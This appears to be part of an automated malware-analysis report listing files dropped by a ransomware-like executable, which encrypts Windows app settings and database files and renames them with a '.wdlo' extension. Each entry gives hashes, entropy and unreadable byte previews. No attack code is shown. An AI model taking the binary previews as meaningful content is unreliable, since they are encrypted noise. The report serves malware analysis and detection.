                  SHA1:18A70800372888103AAD54CAFE110CB11DF0BCCC
                  SHA-256:84ED88473E39CC777EAD7EFEF558B0C6988D8FBBB70FD417704C472AC1425DE2
                  SHA-512:0FA0F79A6DB766C544D20F94DD0B13ECB3DA259A95D4930A53EC234F8902D23A65A8501B49B28FDCA8EA85EB266941D20915EF7548FD5AE1CCDF1D8E1A448145
                  Malicious:false
                  Preview:regf.~.[m:Tq...R*^..].P..T>.......5,.4..HYV..Y.|..3.7....=c..G3".v..XYi.`...S.m.......l.^...1;.........!,..#X.-/...:.a..K@...|..&.XWqf5.......H........:.v.l..1.M.bB.g..A..KF.....f......$O$s.A..\..N.{.[.U.~....sV.]. .}wA...qU...r.nQ...xz#.xb..k..Z.`.f......3._0.\......Z..o[..(6...!.r.c.`..4..$.D.....p...4...{...z.x. ..a......a....1..-.....sk.&TER-...Y.|..5,8..D_+*....e..#fV.P.P.*...8.F.PY.c..lt}.N.F....I.U..j.7....._..$.....Z~b...^\..M6...M....M..E.>..._...[-.y9....c5..'....s..7....\u..... .<c.7..,BQ...m....n8.}.....=.U&T..Rf.n).'..Q..].....6.J..~..Q&.)3.i...3[U....c.....M3..tC`.69...bb.k3..a..^Z1.UB...(..V.<....s.BR..K}.1...t....2..m..GZ.....k...H...U"y......d...._.ql.D.IJ.`.x....+....'.E.F.0(B..6.D.......8...6m..}.SYh-!.R....a.-b.V...H.RSD;l..}.....I.l......P.0../.C..y.S.."......M.%.4.n?;..3.Ul....p..tG..v..{....}.H0Q..1z/F.,=.Y#H..Ov........./5......q...*.b..B./.=?..........\d....4 :i.%.[.{.....|..G"xBs{..f.....T..z...qQ.O|...F..L..m..G0.Q...

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-shm.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):33102
                  Entropy (8bit):7.99491483910942
                  Encrypted:true
                  SSDEEP:768:no5qsolzzbOqrOZLReE7CdQn+JQ4vSj39ndevK:Nl6MOZ0E7Cdq+vvK39dkK
                  MD5:553D1AA4F3EAADF3CE23B1769A26EAE6
                  SHA1:3781497C9FCE1174AB949414B2F198F9A805CD8A
                  SHA-256:0641431CBFA22A8C4EE991BE7FDBA310F610A7B64624617415108AD25FBDBB95
                  SHA-512:1E18E8F071DA93E3EFF14FDDD8B11275D3FC02ED4534276258A4631B6536050D452894BCA5D99684D530318C1F080E97D1ECE8B80E3D1DA0041DA9A545C7E1B3
                  Malicious:true
                  Preview:..-..+.\.v..7.*..9..8WFM.Gp.Yffk..w..B#x.4..C`V...m..lu.....;......C..7q....P.q.C.....o..0|.1..\t*.........~...0......t..^..O....F."..<.a..`....[k,.6.......p_!5`R..^+.+.4....6] ._.W ...i......IS ....q.\..[.A....*f.Ac!.s1....v.%.c.!..&.r7.#.<t.~(.C./...m.....Yl.*.I.......LP*)_<.d9...^...=..7W...~C.*..n..cw\J.@.e.}...>..{....\.......!.[0.V.....q.O..t.._u..y1PvT......P.....&.n.'...U.P..O......e.......y.....$.w^.....j.,.....8.3...6.i..I.......'..x"GC..B.k.z....J....a}..F1....\..Z.=..K|..X.Pg......cB.0VC.|^...X.q....R)..4.Xz...1...Hc?.h....L.EH..Z........A...\........M1.%.v8...2w.6_..Er.s-}......y$-.e"A...e.<a?.b..]..sK..&..)Q.T...<.!.gv.....,.A.t...b..,...j..F.a.`.....P...V..d..H..C4.....V>XE........u.]...l._.3q....Jxh.b...sQ..&-...F^....Wa.o.l...(......7%...a..2...C!7.D$...y.^..T..oJ....3..f.c......w_..q.7k....Zc1....m.u.....6$.V.....l..^..........U. ..d.G6...e..B}...B.>...T...g.=.#.e.~O..........E.q>.6.T.1.bK.Sp.,A.f.?+Ae.......

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite-wal.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:SQLite Write-Ahead Log, version 13793605
                  Category:dropped
                  Size (bytes):1347606
                  Entropy (8bit):1.981399703764243
                  Encrypted:false
                  SSDEEP:3072:3PIFyi1LwdTRu5m8TQkJJEbuXkjaz4nNNl6NIuY2aUAa7FXOZYzlwOuY5h+olR9H:tuwVWm8TQe2E4JAI72TAKF6YJb7r
                  MD5:9A326B2343AC413E670721B702ECDA5C
                  SHA1:9ACAF12FCD9E797C056D8929F42933321B2E4B59
                  SHA-256:8E1DA70DEF8B56557A91F4A78E1BA389C2F8691CF9B952C16D0996ECA7219FBA
                  SHA-512:2A535A5442CCED3BCDEEF7A7D5156A3DC4D82A09CEE325870AA161DB55B3B4DD32F104A7E218EA54C2A1CECCD88E2C8DD84C5CF22872E7E26FAE66F343D61284
                  Malicious:false
                  Preview:7.....yEU....w....G`%*YJ;r..39.>...6...U......@..%.ru......4?.Mi..Y.2........C...q.H".x....U1Z(..;..k....J.MB..G..dG.5#.n...X.......4.'I.T}k@,,.....7U.......@.B(].@M:..<.P.uy....K....y...c..6....vI..n#k.q..w:.H(.Q..[....1P...Zr.M...vu........O.... ..Y....f....I.<..."....o.u<.hbu...,=_.I..J.!S.b%A..@&..b.{..U......f.J..|..X..cN.y..pJ...W...G7...F..d.7.+..8..k...h.....Z"E.%/..H.+.....<5.y.4_.......NZ}.}+..OA.\..3dN..C2.F.~..yg%t-7.."}.....".n..1..*.x>0.....5.QL.[U....vG...{|]..Ahy.L..U.x.]/...N......g.H.d...%.w.^B.9.H.:....P.t.j.(:3+.r~.z...a......f...oB;..e.l..gK./V..K......'W..f..M..#aI.}s..fx..R.......C".Pp....D,..wR..?.;q....._3."..P.p#.\z.....dAe.RW.+z...._......g..Y.......G...g.g=~..i..g.......D.~[H.=h.....i..</...`..)~Rra...]w..d#....o/......4..a.....]_....6.Y...i...A...C.)......]..-..R.x+H..F....[b..".....L...c..,.jx..V.l.6.a:..."....6.......;......3.BsjY..}.o...... ........)....0.A.P.(H..#..(..U..td ....H...b..M~x....z.H.o

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\MediaDb.v1.sqlite.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):4430
                  Entropy (8bit):7.960257056190783
                  Encrypted:false
                  SSDEEP:96:dD8JafRWxZ1lMdHxPzFq9Ef4CqrB1l2MVv10wqsABE:Ge85M7PIE4CqrBiMh11iC
                  MD5:39D07F5D434D071A1A0F7253EE56986B
                  SHA1:58EBAAD38745739DE13FBE16CA9A8054C982ACE1
                  SHA-256:DF052C1F098AB892E0E5021E04F8498E3267FE1627D9BDD2ADF4E9C3877CBD95
                  SHA-512:9CDC615E7000C85C9C5E136A6668461838FA5479E3A4F7E4DA207B0E9CD28485BE7EF5A5C937BCD1134A9F4A0E42FD9C399932784A15EE5387B4B0BBC077F355
                  Malicious:false
                  Preview:SQLit....;u....<S...Bl.pe. ...e|.tE..#.R.E[(f.Hh.h...}..H..0...B.9......<~........8f.4mc....Re.(."a..x.+.........x......@2....V)..lr..<S.f.3..g..W.....Y.....o..>.Z.#........-zx......I1.v....R.tK.^U......al......]z.w.X};..pP.6...i..\.'*..j5..lTi.AsAj.>!..T..5......|...>./....Xd...W.1..G(.r.h..J.u.!.4iqU..........o.1?.s........A..Jj0...Bd.0"...0B.G#....(.\o.F..Ex.a5.<.Kk...=..Fb..9(..0l..W...&..@Z..../8.+.*h.E9....k.`1.@.X..j.......+.0ZS..Y.......h.#.N.....&.....|...m....\ ......'....5...gNf.D...V..T.`..f..........?j.t.....{".h.1..........u...b....&..g....kD..........O...._.p......6....0t....,9.n.%r?..:*.M...Aw.....-.Z4L......l.80.....-....,D.Aw.,....G.Yf.+..mU`.#...k[...%.w.L.2A......z.K.....n./D \.O.....B.0:8.\...u...V.L.x...8..J^2'......at..7......H]........./R......-..-t..[.._.E...b...Y....)....Lr.f...F.n.6'qX..;y[(D.s..../...Z...A......d.......".....aq\...;.j.t9...........C.{...VT.\0..[Mf.?......P.............8.A.~[{.,%...i...8...A.

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\LocalState\PhotosAppTracing_startedInBGMode.etl.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):65870
                  Entropy (8bit):7.997231587270536
                  Encrypted:true
                  SSDEEP:1536:B+pfLuxJSOc4xQ9I8pylUFrWQ5OmJNUd2:kpfLxd4x/8ioySDJ2d2
                  MD5:B23423193F74235669CCD641A7AF7AAC
                  SHA1:610F8DA7241E5D6ECAB92624DC2380BFDE1AD02D
                  SHA-256:471FBEF16ACCE2663FCD4BF340FA5090D2A14750A1878D90B751134ABB05E087
                  SHA-512:7D353CF69900DC29B37A9C4E3B4FDBBE75CB86C8B3BB56DCA7A2F54858E28D2100A2C4CB5820D7A800F5CBC6C1D0F2E3B21D963ACE697B675EC788F1E49F7E01
                  Malicious:true
                  Preview:...........\F.;.K.74>...'N..D*.+.....$pwy...\...AN.....H...j...n*z....-..h.N......'.....}.M.\br..G...~.F...~....vh..k..C.l~nb....$-....{H/........8.9.E.@....w.......5mc>....l..3..\.k'Rr.....Q.n.M-$B.h...M..S9qn.....y/g.3f\.X\..8A..Af.x....D..V.-.#7...7...s..Bs..*t.(.w.#uR..~5A...].Y....P.N...*......*....3x&MT{..f.....HFm)..!.6C......~.cb@.......q...b...l.XL.........J....XjJ..M.!e...nq5.....,.O...Z........M......!D.{.f.6.s*,.2...~.1G.^....[.X.........J.....V'...E.<.......7N.(]`...yp4.......@....h...4....H.EW%...,.. bV.....L..8ip.b....(......{<..&..Y7;_~I.~m.....-.e...Q...w&.m...,s.X......{.>IT4....D"R..c.h=..W....`...-.`....q..tvhL.%..o$....{...`i.'.....'/....W.q..4.z.s].*J..N&x..&DZ..j.5..(.POi.0h.&...o........fi.....u.$...IS..*W9..=d..Q.J..!....^...O...gR..z....j..Ef.a.%...Pt.0a......a...o.....q.F...?.......V...t..C...d2......|{".7.+.....).\.DqYn9.J..a.jaq).#...v.*>.....Uz..65#...u.........<.M."...W.Vn+....`8i.C!..}5.9...kp<<a..f.9z

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.LOG1.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.980660587640491
                  Encrypted:false
                  SSDEEP:192:88/yGbs0QNMTc4QG6kDjOiTv0XOqWg2sNatzfVk+8Xk+IyGq+jR6:5PbdQNsLTmZABfyIyGDw
                  MD5:13918F67769F7C3AEC90B34A81D51A7C
                  SHA1:56759E1BD3BC54BD881B82EA9C4EA470DAC88F53
                  SHA-256:A8E855ED94AA7F27D780E71F47803D3A586180C70DB574CB5517AF5F017ED8BC
                  SHA-512:4F518F21EC7B0A67743F69CBE250EE32E6C84B800954FA6938C14E6F72DD1FAEBC95EBAE96EB4E8D915585BEC0577F431BD14FC501F38D8F75FA92F9BF358D20
                  Malicious:false
                  Preview:regf..!.........-kX......F...^..)r..\~..GZ;.I.W...G_.C.C...f..6<J.iJ...&.d4....3Y4..r.T...j..<HCn:[..y.}D.K..:.)d....+X..KR.E.nT..ofV.?q..Q...1.tZ..e.:.%G...V|4..0dG.-\..H.....l.T..x...e..]..c".D..=.......&.$.`..j...\O..=...'.&...4.q.O..g% .Nj.....6Tg.G.o."bG. `=y...m.%.\#l.u@>..7..FbAQX*+........r...+.......l.:.+{G.eUI....b.Va...$.5N:.....]...w.I.`...Z...C.Z.......h....kC.S.M.......p.....h,H..Z..L.....,..W....uZ.....F..nn.+...2........z....,t.#..LG.."..4...C.F...n...E}..!.C.}...8..f..H.....BaM.a@...+h...u..E. .g.X.?..i.i.....V.#@..h..|.Q:YS.Ye.b.-......M@R.>....]'.9'U.v0......lCY......0....ua.Db..|..+.9cR.]..L,.."M>`.z...u@.&.....x'd....0...Y.(=t...4..,..Z.....'$;...1c...dfD..u......l.dF:. qx....i_V....I>$..(-...Q.l.j........xBy.......t..(5..........<.IV.p......pC..<...2tY.>..F..-..G.?#.dy.....!..B....._m.Yj...(.)S.j;..I{-au....w.@.6.! .$.h.2...:p.$3u.j#.Q....>.O%9.,!...-...7N.......i.B.7.l.skg....`-..[.n...y.v.E..,..........k...c'....

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.Photos_8wekyb3d8bbwe\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9810893340701465
                  Encrypted:false
                  SSDEEP:192:N+CDWUEkbVXDc6PGwvCQ8hhiozCtUuObtgYhyB6qvPY:klnkbVXRShNCoyBHY
                  MD5:BB112747906FFD184452BB00B94EF538
                  SHA1:A0299672F349FD6FD8070F0B31D715FF9E1E75CF
                  SHA-256:B8BDC2C6CE7CD5F996032C0184DD18AB6A5A057FB59BDC06B2DC18D6B1C65D37
                  SHA-512:8FA54E3D4CAEC94A42978659825C948E444EAA09D888DB86B57E610D570C80C1AD7DDC13F3D51DFAB767BF6E688B4F7ABF827CAA6C0D791E0DC3698E85B8E9E9
                  Malicious:false
                  Preview:regf....T\...Q .._..+V..oW..yJ.....x..A]d(.%-X..l.E.. ...............&..(..Y..0.-G.5/.!MZ."..r.B.....{p?Qx........*#^.3..Rs........s,.ZF.g..v....A..n.*...y..{3...h..'....}^..Gz.z....`....Z..v.9fy<..=@...Qa..=TTM...~l..3.n.O..W....0Wz@..V....T .t.S..F1.H....rw.M....$%.......2.Y.`..;.C*...GZ).......S....8Z.).lj.i.0...f.0`.3p.z.IS...]K.....R.a{.c@.OV..#.l....%h..S^...n..<..2..q.,.3I.C...<;.....'..j..B~}..5.).o%,:..)d.L...........k..2@..IJ$.t....;l...j...{r..[w.EsDh<&`....p{.3.D.D&.^oc.......#.B..!.n~.=.zA.. +..%..|..;!&>oY.L.]S.\p.&{....o.[.r.(..s}$....[...........+=...[DG. j....h..Q..3....a.pWz715I..$...F.g.[..I7a..C.AI.P.h}...-.....KR.._g[.B|...f+h..F.......3R.i.....Y.v.%/h..."l.S.Su.{o`....` .....~>,.\c_.pm.u.-.@..OTl.<...t!.i.._?.,....q..I@.../.}.j..&.%.A,.q?.........G..6.W..>........(.zL1..&vt`.'d...f.@...6i....u.xW.....Iw{.....R.b.g.w.c.......Z...^dt.H:6.....Y>v[G{n...SIX..7..4KfaR.."L.S|.(.....C..r.....f...3..5{.VM..L.........!M......_.*q..i

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.PinningConfirmationDialog_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9757646904859065
                  Encrypted:false
                  SSDEEP:192:jV4A6PV6Ftw/OoOE2j7L1TdDuAUPhy+wYB1m3Xq4pKStDMvn2v8k:5P6PV6joOESNBCtg+zmXq+KStYvSH
                  MD5:992A348F1DE341CF9A44633FC083E554
                  SHA1:977F22B7DBFB7F1DAD56BFE9E8DE96D2A24574EB
                  SHA-256:098F9DC4C261603741A6AA824B0AF31995E8D81251CC64B088CA838D4C9724FC
                  SHA-512:A16EED0B80D020087F138071105C9D30192B7D1DDBE8D81912963FF1E551D3A5CF98E2E630A99FEE0E79E5759672C4D510B3732CC802BEA5C746947596082949
                  Malicious:false
                  Preview:regf..(W.=..}.j...B.@..'.j ..g.4.....k..jM.?..Q......DC...$}[9.A..d9e.......9..y. Y.7..1S$..b..+`..P6...@....r.'._.c...8....wf.2.i..O. ...<2..U.2...M=P.|.9.....t....6..!..7]I7........L.A..,...v.G..^....p.6.;..`..1p%.c<.iy..3/.r.@p.d....{m.......G..._}[.+.X...QF....7.P.....X.8..T...lY.....#P.bi......Y.....J.'..a).....[...A.I..5P.d.........`.el7.]...SRh./"...&...U...).NV...a...tR.s/V..'.u..y .^..a..t.]......$0..*..h.+ ...i.1...S3....m..@".A.Jt1...].V <./...1....G.c(.R.j.-=...].Gt.I..LW.......k4La...xjNT!~...d..e%..>...R..N`.+.....u..z.<.;.6..E.r>zw....6..O.1..%V...J..-.>..(P.b.n..HH0f#..........T@..Z....m..c.r.......E.......Pb;%..-\#|dn....K(^..~gL.0....J.chPK.W.WA....z..v.w...3x.8A#:.30!.M.M......X...rI....FGp.F.3.Dz.QR..v...nw.....]."$?.)G4..(R8..7}...t./:...O....h.7..&r....N.(.1h..."..!.Q.*O.HIC.\;k....7.w.k.....T...+%....:.].K.X+.T..+W.$..d...Nc._I....]........[1..2..^.{\G.\..y.^l.....G..........L..........`.<G.^*.-f.....A....Fi.J..p%Uc.X...c

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.Search_cw5n1h2txyewy\TempState\CortanaUnifiedTileModelCache.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:data
                  Category:dropped
                  Size (bytes):39476
                  Entropy (8bit):7.994430625781655
                  Encrypted:true
                  SSDEEP:768:ivk5PUM1pdGnz0S7gtewkK31TLGdJ78tjnx2TqA398sO6fLsZOQzx6HZ99UL:B5PU0G0wRs1GD4tjxu1iwTvQzx6H1UL
                  MD5:03349E55F594612DDE1286D762223796
                  SHA1:1C04C04F31EF58CAA5074904DA28FCCF078275A8
                  SHA-256:0D75A18FC9FAD683BB3C163C1D2DA8EDCF86EC97AE76F720C655AD4709C17A0C
                  SHA-512:3BA0E41886AF4CDF8CBB2CD02F0B1418C10B490E3949D51FBE18BF03D6AEA7608361EAB4D48F95E1936D3F0E2B8A731B46C6164F1743ABCDD8A7A48D30C55543
                  Malicious:true
                  Preview:..].N..oU..~.......!..b.AE..l..u.f...!.....,#^....i...i.4..i|.E.3.a..m...:4=!....G.Y.M.#]X...2|+.i.[.k.Q../.%.E..,.....G.:..te.v........B....A=i..9.8K....44{%.vt...i5...D.^.....9....R....r.A...7w.l...@....i.d.......'.O....P.W...^_.......X..r...)!...._.=A..E..<.QJ.j_^A .....$.B$....U...I.3.W..a^.q.M.nO..I.......F .?...4.p.Qlg.8.go.......I.Jb..#..v....v..c...Os.#.H./ROf..pH..;...g.~\...S...D...i.!a....;..4v...K...vdx..qf.t.5.d.W...:X..`...:y.*..;....0.Q.M.D..zQ.c.<T.....5..*....=^x.q2S.^y.._U....L....8W..:.......q......U...6..vM.A..}=*...g..GWvDG.b.n5W.2.,6..x...*....=s".H..1.,..*..M..D....i:....8.5&.....l....>..../9Z_.......R.TW|k.Vl~+....x..j@..Y..qW.e..O...R....I..GF#p.s...7Z....i<..7`..I.o._....#.o..?;/.....3..SJ...%+.M..@.^........h...k.k?..]r....fj.r o...S.6..^y....T..X...I.........0I.v.;.Y.G.3..yk.w...An.[i6..9.L..a.JF)......x.J'.h........L-......A.;.8.]..z....,G...";.9...(....X_..'-.S3..._............)...!.TDj?..dV

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.SecHealthUI_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.980648262770271
                  Encrypted:false
                  SSDEEP:192:2JntcOQwFPxg/mkLvByi60Qtqyj1z7ufMKJTK8D3:pegJY0QUguRJZ7
                  MD5:20D2767747D5EE4691E607555D0B8F69
                  SHA1:FFF4C0F8AF7D36BD71DAFA28FDA5EAE028C9174E
                  SHA-256:7F8E94E6926DF15A766031D5D7A0B605E959E5DDAB5B082763401C9863E0C8FA
                  SHA-512:9B0815F3DC2F7F5283448C41D67D479241B1089E0C526993FC19432F2B3FDA71244D93B55C7C324652D11337A59E23E18E6E2A08FC73E1BAED37DE3EFEEBF578
                  Malicious:false
                  Preview:regf./Y.....4}..h..@.#..(....E.^...<eH9......!|..C`.....Q.5X....e`..W.w..N~.7.m..]..+.2..N....Mp.|.tp].....3H.'K3.../d.;...8...ce.3.......y.H.K2.~.ch..wZ.Ir......~.`n....BW.....>.h.../.c.....?f9.W5qT6....+.m.?.A.U..3j....$L&.Y#..]Y...@Z.:^..w.+....z..\I...w.%:0.9..ly.y!..Se-.W......8..:........4...N.......Lx .a.>d....p=9.Q3\.....D...J....r6...n..y.[.N...$...f...Y._.{....XZ.4i...J..3.....:ji.(.$..8..a.b\.....+...NO.-.m..%d......... ....U...,..m..Tw.........EY.U..IM.......xY.....[W......w../..J.!.Y..p.&?..r.=^.qcL..3q..c..&~.HD..........8.XKH...:.hP.sH{nl....{vH.0w...."'T!@B^2w.v.<..O....Q..:..h....^Y+...z..I..`D....... U.w>..lmm.qR.&....O...|.7..@s.s...p]K......5...L.g...1.u5".t......5?1.Fl^._......R.H.8`\U.2...;....o(......O...RtT<.;...O-)..X"h7...3).B..N.<...?.!8lcM.x\...,...{.......?6E...^......O.xr....X.k.....}.@..at.<..s...u......(J..?e.0...*..p.}...S..X...I.t.c(+,.[:.Z..g....K...O%....9w...c....w.c)...n..y......\..}<f...-...Y..T0Oo

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.SecureAssessmentBrowser_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.978294378034203
                  Encrypted:false
                  SSDEEP:192:imIJBGePuKFA70ilNUzhhcIn0n4vqXrlCQ7J:imIJBG9qCPUzhZ0n4vqXxCC
                  MD5:BF21F58C83B77F91174E0D3F077955BE
                  SHA1:0B8915EA30BF75E79CC669366E8889844BCAD76F
                  SHA-256:F3A7B721CBF51779808EA9778A6CB8FEB9BE642806DC8084DD96F23570F05570
                  SHA-512:01D3ABC3F1542938F53302873ED72CDFE0674EC570619E8C14ABEEBEB0F1A6381712E790FFE1151280BA5B50679859CC89BBECC28FABBE5AA8F1334663696B3A
                  Malicious:false
                  Preview:regf...owx. S. .![\=.DM".o0..dV..q..X.do.wY.0..\.R.k..F.$.......4*...=....<\..,T)$)c....a.PR..N.^.k...TZ|D......Y...~e..<...?O.[....4...'[M.6..j.:8................[.>.w.:......A.."...g).jg...ajr.G............_.j,[sw..."R.fL.y.thr...g*......]5)..'r.30.0.@....E.WB.g.....AHe.G,...ZO.qk.{2.#s.F.v...<4........9=L+Q..}.f.Pq3.1...A.9x....I...*.).&.^=.m......jx.mJa'd..Y.f.oJ....gS]..b.w.n...[..mS..M..........8.....+.DW...........1J.$.}..5..C.?P...8B....OU`....V..e.v.A../y.......^.>.#....J"..._.......C... ..8An.......Dh......=.....0.......1...S.Y...#.....".x....o.z|W, c.M.N...sH#E....c...*s.D.....x`..a.G+P..6.).......U..yQ...Q...H..#.W....K.....~......./.Z.@8D)o,L..........}...L..e.w..h..........0g!..>Qg.......Q..(..,.1..j~?......\>...Au\.}...IS%.A......V.u...ow.....Q_2..W..Q...,..a..L..R.._.oy1+.._../h.../I...+.1..'.c:..W.S.....bB.....~......r.@*.........}.....6:.t....-.0g..$....!.ylp.ciw...G...i.......}V....i.6..UC.z_

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG1.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):8526
                  Entropy (8bit):7.9779236504845175
                  Encrypted:false
                  SSDEEP:192:CzF6qElYzZeG3eSzsc9KUBra3LgUOahmQB1ukM8/CiOJiD17lA:sF6bYzZeG3PPZra37O+BrOi+
                  MD5:480F306AE81424B6F19B11CE0320ED97
                  SHA1:00B6FDFAEB398A0BCFA87B1DC3647011546A73DB
                  SHA-256:EFDE8971D4BD0F8C0EFA0448ED33F5497248A4BCEF0D212FFA83F260AAF5DB85
                  SHA-512:45AEA6C544B2DAC20D75D89C898F12B418EC6744E6BBC60FD3735271A10500A60C4275A2E6F72DE03B38189CE18FCD1DEC166EE689BE48DB55FF2AA142278022
                  Malicious:false
                  Preview:regf...9$...p9...D...7..d.2.Ar..-.......+..YR..~5..I.H.)rR..p..1.o..[..F{..a...}}_..17.c. ...MT...E. ..y...-e..}H%..B9. YC{.>.L0...:./j........RX$.....v..#..d..f.z$..m....%B..&..:.0^........o..n.......K.r....Y.....k...C...qn.......tPRy....oOK...4..k;.lc..:.'..7wgV..<IR..u....ey........G[.g. \..._MV.w..H_.*...`Yo....c@...D:..Te..^.....N...}.H.?W.2.|..T.Q.......aL...,..k..%<x.P.j.Kx..o...;...\S.#+.Z.q@...{..7....h.?k....7.....". sW.e..H..+Ll.E....Ci./..%.........V_..>b.6......oy...=.....w..=8.a...(.. .1.g.r3h...0.g... L..../h......MmXSOY...J..8..yz.]Z..+.^c.d-:+R.A.l.....{.b.Y...{.j.O]NGW...G].5...ld._.'..-....x...#.M...)A{.vY(r...>[..<.?O...uN:..L.F.i..\t.M.7.}.........Mb.....j.%iO{X.#!.B...0B.n.)...V..0....J.pd....-.mK..?...i..b.....@`7T*h.;8...O..".._....{......m...}.....b...7...|Z.bg..".....t.........:`k........$.^.:^....m..|f?..<5..=&.f..Z.l...wj..P..s..e.a..h.2...o.=>\...R.L.hV..T....j..&a..f.F.....M(p*.0.`,Y.[..NH.........4.rE....D....W.f.e..

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.LOG2.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):33102
                  Entropy (8bit):7.99466125860757
                  Encrypted:true
                  SSDEEP:768:hbIYQmd85esXYZwGwSx0kll2+pBgBk6UGufQ9kxXZz51uGPBGfxY6f:yYQmd80CzTM7l2+0W6diRXZ9YGPBGfCO
                  MD5:4AE605C8EC92B4CC98173FA9ABA46AD5
                  SHA1:4B5E8C73BAB9EF3F0BC4E53FA5848AE2057EBDF5
                  SHA-256:28BE7518CEF7291C5752A2CAF25514D23DA4B0F46F73B50E789E8F4AECBFA670
                  SHA-512:91815C77B882F6DD13D85E242888AB2A9F1FA24E879ED4D485ABB136DC5712FE9C86149E4C5DE245D79C4328F415F321EAC1E384D83C40CB0FE8CA0DE11968FD
                  Malicious:true
                  Preview:regf.a..GRCE..GH..3.|c.#}.E...A...[....X5Fx9......p(1.f.s......N....iE.(.....[q}.=.........DJ.9..uP.k..o"d.........>(I...O.U.}....}..$......E@.M5.. .d@{O.....d.|.......]...@.J.ju.F$9.....3....cfz.#4.kbM.f....e.8....j[....H...h.B'......`.. ....d.....ps....D.U...\..2.z].D.=...Y/..a..i..z^.`.s.....B..Q..D.....\i.'\g..d.....<KJ).z;\...e;...P......S*7......r....|.B..k.......q(..{%..=...r.....v...*...TH<.>m!.e.d_.V6......u.:-.{..c..3aa(=..n.I0d.D......w..~W..M...>M...@......z+.9G.!wU...H.Se.u.O^.....s0..l'8.Q.d..3.6{...{8.L[Q}.gb..pV..7.~4i_....g......|......$I.S......#O..o.1..T9.#H.7...!...K..14.+.>f..0G.l._?F,..#..........P[(mY....)-......>3..*.z.}...WdZ.......J.v...z..miviL..|.L.^FO....n-pd...i.WP....fd0.P..,.N_.....b...c.kG...v,U..J....m%..5..S.*.....)$...V..(h1...+W>l.:.....:..J.\{....9........P..s.#..t#..k.d.&............D.(.P..Q7.....r.|.._..<....?....j...M4$O...1h.V.N.-.ev..`!..g?... g.......C..\...r..PV.4i.H..j..z.#.......2_.M....

                  C:\Users\user\Local Settings\Packages\Microsoft.Windows.ShellExperienceHost_cw5n1h2txyewy\Settings\settings.dat.wdlo (copy)

                  Download File
                  Process:C:\Users\user\Desktop\DE1BEC11380A046D35656CB592A399445A6DEB5934A2892DCD5DAC3D0F61C55E.exe
                  File Type:MS Windows registry file, NT/2000 or above
                  Category:dropped
                  Size (bytes):16718
                  Entropy (8bit):7.9872477828158965
                  Encrypted:false
                  SSDEEP:384:QrJJ6aaXflN18UefUSazXrDSGWAe0EE+n79PGNkMLV+laD:y6aaXf7efUSgaGWAid+NbclaD
                  MD5:E8EA9F9388117F1C9A75C77A3240831F
